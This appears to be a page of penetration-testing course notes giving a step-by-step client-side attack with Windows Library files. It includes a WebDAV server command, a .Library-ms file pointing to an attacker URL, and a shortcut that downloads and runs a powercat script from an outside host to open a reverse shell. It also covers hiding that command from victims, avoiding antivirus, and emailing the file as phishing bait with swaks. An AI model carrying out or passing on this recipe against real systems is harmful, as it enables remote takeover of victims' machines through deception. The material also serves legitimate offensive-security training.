> For the complete documentation index, see [llms.txt](https://tamagosecurity.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://tamagosecurity.gitbook.io/notes/client-side-attacks/windows-library-files.md).

# Windows Library Files

{% stepper %}
{% step %}

### Start WebDAV server

```
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/
```

{% endstep %}

{% step %}

### Use vscode and name it config.Library-ms

Open VSCode (or another editor) and name the file `config.Library-ms`.
{% endstep %}

{% step %}

### Paste the code and change the URL to attacker IP

```
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://CHANGEME</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
```

Replace the `http://CHANGEME` URL with your attacker-hosted URL.
{% endstep %}

{% step %}

### Create a shortcut to fetch and execute powercat reverse shell

Create a Shortcut file named `automatic_configuration` containing this command:

```
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.3:8000/powercat.ps1');
powercat -c 192.168.119.3 -p 4444 -e powershell"
```

{% hint style="info" %}
If we expect that our victims are tech-savvy enough to actually check where the shortcut files are pointing, we can use a handy trick. Since our provided command looks very suspicious, we could just put a delimiter and benign command behind it to push the malicious command out of the visible area in the file's property menu. If a user were to check the shortcut, they would only see the benign command.
{% endhint %}
{% endstep %}

{% step %}

### Start servers on the attacker's machine

On the Kali machine, start a Python3 web server on port 8000 where `powercat.ps1` is located and start a Netcat listener on port 4444.

{% hint style="info" %}
Instead of using a Python3 web server to serve Powercat, we could also host it on the WebDAV share. However, as our WebDAV share is writable, AV and other security solutions could remove or quarantine our payload. If we configure the WebDAV share as read-only, we'd lose a great method of transferring files from target systems. Throughout this course, we'll use a Python3 web server to serve our payload for attacks utilizing Windows Library files.
{% endhint %}
{% endstep %}

{% step %}

### Make it seem genuine

Write enticing or plausible content to increase the likelihood that a user will click the file.
{% endstep %}

{% step %}

### Transfer the Library file

Transfer via SMB:

```
smbclient //192.168.50.195/share -c 'put config.Library-ms'
```

Or send via SMTP/Mail using \[\[Swaks]]:

```
swaks -t dave.wizard@supermagicorg.com --from test@supermagicorg.com -ap --attach @config.Library-ms --server 192.168.234.199 --body body.txt --header "Subject: Problems" --suppress-data
```

{% endstep %}
{% endstepper %}
